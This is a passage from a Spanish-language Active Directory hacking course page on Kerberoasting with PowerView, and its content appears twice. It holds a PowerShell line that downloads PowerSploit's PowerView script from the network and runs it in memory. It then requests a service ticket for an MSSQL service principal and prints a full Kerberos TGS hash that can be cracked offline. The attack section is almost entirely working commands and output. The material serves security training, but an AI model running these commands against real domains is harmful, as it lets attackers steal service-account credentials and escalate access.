Hacking en Active Directory - [CPAD-100]

Utilizando PowerView

AnteriorUtilizando CrackMapExec SiguienteASREProastable

Última actualización hace 9 meses

¿Te fue útil?

Utilizando PowerView

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: . ¡Te esperamos para empezar este viaje juntos!

Para realizar este ataque utilizando PowerView simplemente ejecutamos los siguientes comandos:

PS C:\Users\admin> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');
PS C:\Users\admin> Request-SPNTicket -SPN "MSSQL/sql.spartancybersec.corp"

SamAccountName       : UNKNOWN
DistinguishedName    : UNKNOWN
ServicePrincipalName : MSSQL/sql.spartancybersec.corp
TicketByteHexStream  :
Hash                 : $krb5tgs$23$*UNKNOWN$UNKNOWN$MSSQL/sql.spartancybersec.corp*$6B69ADEDEAC5550DB12678F83A6F78CF$90
                       F6A8A460C9696A2FD352F4BB616DABF89CE6D552D6BEE9435C6F1471C56F9E1E891509B04DB12949BF111020F68D8E16
                       1925AE7384A5FDB646D4C8641F8819CAD956F7D49850221947F25D934B9106F7E0B633434F71BFFBBEB8692F360F4372
                       AD3FE0DF92E1BFAFCB2C9504F474C352A4934B2FCFBDE554704D3E3724BAE968AFF77E3B1222DF4A8593667D95B62620
                       959CE22B390D9E7B84A945DC9AF5910CD45CE6F7335F8A7E4C616D4B9A31647120E4A128EEA1258F25FFCA4A1B6AB8B5
                       24BF20A03A2CBDAC5B2B9A008AEA5D723073E012B866502E0D557D6485E20AFF057CF7A85CEC6AD955B4CBFF910D4AEE
                       93E4D7BABE1DF37758194B757AB62699DA5384C721AC8DBCCC11C9AB4EC68BC7133607246A610AECEDA5CB8BB457DA90
                       268312126EBB8B8CFAC84D12B71DD6F0158C699232AE6023257D44A48CEB9C18FAEC127C3D1432BEDF461C9AB4F16204
                       FFA7CF975B00A38F904837A24BDB64FA0496562D8EEC7C869B7B8270AABCC0B03935A9EAAF13DD5115A0D7E28E2B7ED0
                       AC7C67AFD5DB041F92905CF5C0F0E8058241E443FC23E4BC048D10ACB909D87E987EBDB53A5279A89389B4B512ED3042
                       53BEB7DCD8615D21EAFBA76BCAA3C6FE42204D5A4678A32606ED2E6EF42BF60AD2154A5CA5C195493C4568AAB1CC918D
                       BF3D1FD7DF08A56F04DCA167B9EC7173CC753C8254A1FFA44BAB389ED827BA406B909D301EFCDF00E17050C8B5BAA345
                       F961F065121A903886A607BE931E34F3AD8339CA64AD3C36DB697EC9DBE561B69BA1A34793D8EA19CDA2C0FFE7F4BB40
                       57415C3680BBF62723F72568EDC7F6B1CB5EC7E8362DD1B26905EB347FD3C22163441C1BF0CCE92328BC4FCCD5E267A8
                       FBAE9AA16B6B371881851407AD5D00A1BE0CA0D5B91822725D3F6D5EB8F969F4380DB7A60D4B57A6326460AC79EF98FD
                       58A05FED5E6A139953188A060F0B5E222AC0FA084BA120E6421C20A83EC89E48B6057500374CA27C0880529196B42DD6
                       AD381E5E401B6ABAD68B4FB37B64C35B75F3A6C09097840C704AE119E4B37139649BAC11BC77316B1101A4AE3E2D3F78
                       169F0B2AD34A1C82A54E8F400BE87932A462A80FFB2F87C7F0815E36603BAFBC4AEDF85B0E32A6DB7EFAB9A7244B7E4E
                       DA8AE53777E0A334789FB426EBC8B4C6F35F029B7CAFD87359ED2F933E1936EE9287359A87A8193BC7BD949048267AF5
                       B24DAD424D22A5EF30F364C2A7BF1459830894405524FD7D397F6A9B310A698817712DC22E8A1F43410B935C4C948531
                       D1155FDB2D5098A22909283D2CA2A5FD803F245D775AD1B02B0A1D4C4A385BCFDB2CBD87FFCF72523BD1AFDE2DB06BA9
                       5D8CD6038BD99BAFEFB50560157A1606FEA5881087A29A966D83813EDE4B9B862D9F3B11BA8540BCA0BD0FDF2D3D89E4
                       7D91794725DE9FB38817006DF425F074EAE6D2571CD35CE5CB9F32E4AD43953EC4FDF21758D8AA862115D78652F22D81
                       F28791907B7A2C644AB46B7603FC8758498672830EF3E28592BC9070CEB31B5EBC6A6358A3DDB13A2D75DB3954223B16
                       8111163014BC22607DC66E0FB904D96B2681ADB1D4DE1B6D2529EC45AA65438862300B8AF189513868E35170E22F2A46
                       73E9F4444302464D1EC9E2DB2281B625E0E52FF1B5069BC4D81E689131C5CDD4C55C073CB41FB136ACBB859FD0314633
                       B3B221

AnteriorUtilizando CrackMapExec SiguienteASREProastable

Última actualización hace 9 meses

¿Te fue útil?

Para realizar este ataque utilizando PowerView simplemente ejecutamos los siguientes comandos:

PS C:\Users\admin> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');
PS C:\Users\admin> Request-SPNTicket -SPN "MSSQL/sql.spartancybersec.corp"

SamAccountName       : UNKNOWN
DistinguishedName    : UNKNOWN
ServicePrincipalName : MSSQL/sql.spartancybersec.corp
TicketByteHexStream  :
Hash                 : $krb5tgs$23$*UNKNOWN$UNKNOWN$MSSQL/sql.spartancybersec.corp*$6B69ADEDEAC5550DB12678F83A6F78CF$90
                       F6A8A460C9696A2FD352F4BB616DABF89CE6D552D6BEE9435C6F1471C56F9E1E891509B04DB12949BF111020F68D8E16
                       1925AE7384A5FDB646D4C8641F8819CAD956F7D49850221947F25D934B9106F7E0B633434F71BFFBBEB8692F360F4372
                       AD3FE0DF92E1BFAFCB2C9504F474C352A4934B2FCFBDE554704D3E3724BAE968AFF77E3B1222DF4A8593667D95B62620
                       959CE22B390D9E7B84A945DC9AF5910CD45CE6F7335F8A7E4C616D4B9A31647120E4A128EEA1258F25FFCA4A1B6AB8B5
                       24BF20A03A2CBDAC5B2B9A008AEA5D723073E012B866502E0D557D6485E20AFF057CF7A85CEC6AD955B4CBFF910D4AEE
                       93E4D7BABE1DF37758194B757AB62699DA5384C721AC8DBCCC11C9AB4EC68BC7133607246A610AECEDA5CB8BB457DA90
                       268312126EBB8B8CFAC84D12B71DD6F0158C699232AE6023257D44A48CEB9C18FAEC127C3D1432BEDF461C9AB4F16204
                       FFA7CF975B00A38F904837A24BDB64FA0496562D8EEC7C869B7B8270AABCC0B03935A9EAAF13DD5115A0D7E28E2B7ED0
                       AC7C67AFD5DB041F92905CF5C0F0E8058241E443FC23E4BC048D10ACB909D87E987EBDB53A5279A89389B4B512ED3042
                       53BEB7DCD8615D21EAFBA76BCAA3C6FE42204D5A4678A32606ED2E6EF42BF60AD2154A5CA5C195493C4568AAB1CC918D
                       BF3D1FD7DF08A56F04DCA167B9EC7173CC753C8254A1FFA44BAB389ED827BA406B909D301EFCDF00E17050C8B5BAA345
                       F961F065121A903886A607BE931E34F3AD8339CA64AD3C36DB697EC9DBE561B69BA1A34793D8EA19CDA2C0FFE7F4BB40
                       57415C3680BBF62723F72568EDC7F6B1CB5EC7E8362DD1B26905EB347FD3C22163441C1BF0CCE92328BC4FCCD5E267A8
                       FBAE9AA16B6B371881851407AD5D00A1BE0CA0D5B91822725D3F6D5EB8F969F4380DB7A60D4B57A6326460AC79EF98FD
                       58A05FED5E6A139953188A060F0B5E222AC0FA084BA120E6421C20A83EC89E48B6057500374CA27C0880529196B42DD6
                       AD381E5E401B6ABAD68B4FB37B64C35B75F3A6C09097840C704AE119E4B37139649BAC11BC77316B1101A4AE3E2D3F78
                       169F0B2AD34A1C82A54E8F400BE87932A462A80FFB2F87C7F0815E36603BAFBC4AEDF85B0E32A6DB7EFAB9A7244B7E4E
                       DA8AE53777E0A334789FB426EBC8B4C6F35F029B7CAFD87359ED2F933E1936EE9287359A87A8193BC7BD949048267AF5
                       B24DAD424D22A5EF30F364C2A7BF1459830894405524FD7D397F6A9B310A698817712DC22E8A1F43410B935C4C948531
                       D1155FDB2D5098A22909283D2CA2A5FD803F245D775AD1B02B0A1D4C4A385BCFDB2CBD87FFCF72523BD1AFDE2DB06BA9
                       5D8CD6038BD99BAFEFB50560157A1606FEA5881087A29A966D83813EDE4B9B862D9F3B11BA8540BCA0BD0FDF2D3D89E4
                       7D91794725DE9FB38817006DF425F074EAE6D2571CD35CE5CB9F32E4AD43953EC4FDF21758D8AA862115D78652F22D81
                       F28791907B7A2C644AB46B7603FC8758498672830EF3E28592BC9070CEB31B5EBC6A6358A3DDB13A2D75DB3954223B16
                       8111163014BC22607DC66E0FB904D96B2681ADB1D4DE1B6D2529EC45AA65438862300B8AF189513868E35170E22F2A46
                       73E9F4444302464D1EC9E2DB2281B625E0E52FF1B5069BC4D81E689131C5CDD4C55C073CB41FB136ACBB859FD0314633
                       B3B221